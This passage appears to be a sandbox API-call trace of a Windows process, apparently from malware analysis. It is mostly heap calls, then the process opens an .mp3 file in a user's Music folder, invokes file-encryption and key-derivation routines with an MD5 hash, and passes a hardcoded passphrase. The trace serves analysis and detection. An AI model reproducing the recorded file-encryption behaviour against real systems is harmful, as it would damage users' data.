(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.791] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0110.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0110.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0110.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca2f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0110.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.793] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0110.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0110.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0110.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0110.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0110.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0110.794] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MZTSENpJHOvP.mp3" (normalized: "c:\\users\\fd1hvy\\music\\mztsenpjhovp.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0110.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0110.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0110.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0110.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0110.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.796] FreeLibrary (hLibModule=0x772d0000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.797] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.797] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.797] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0110.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0110.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0110.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0110.799] CloseHandle (hObject=0x258) returned 1 [0110.799] FreeLibrary (hLibModule=0x772d0000) returned 1 [0110.799] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0110.799] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\MZTSENpJHOvP.mp3", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6af1030, ftCreationTime.dwHighDateTime=0x1d5e5e7, ftLastAccessTime.dwLowDateTime=0xe23eca30, ftLastAccessTime.dwHighDateTime=0x1d5e55e, ftLastWriteTime.dwLowDateTime=0xe23eca30, ftLastWriteTime.dwHighDateTime=0x1d5e55e, nFileSizeHigh=0x0, nFileSizeLow=0x10c18, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="MZTSENpJHOvP.mp3", cAlternateFileName="MZTSEN~1.MP3")) returned 0x41ac2c0 [0110.799] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0110.800] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.800] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0110.800] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.800] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0110.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0110.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0110.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0110.800] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0110.801] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0110.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.801] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0110.801] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.801] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.801] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.801] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0110.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca3b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0110.801] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0110.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 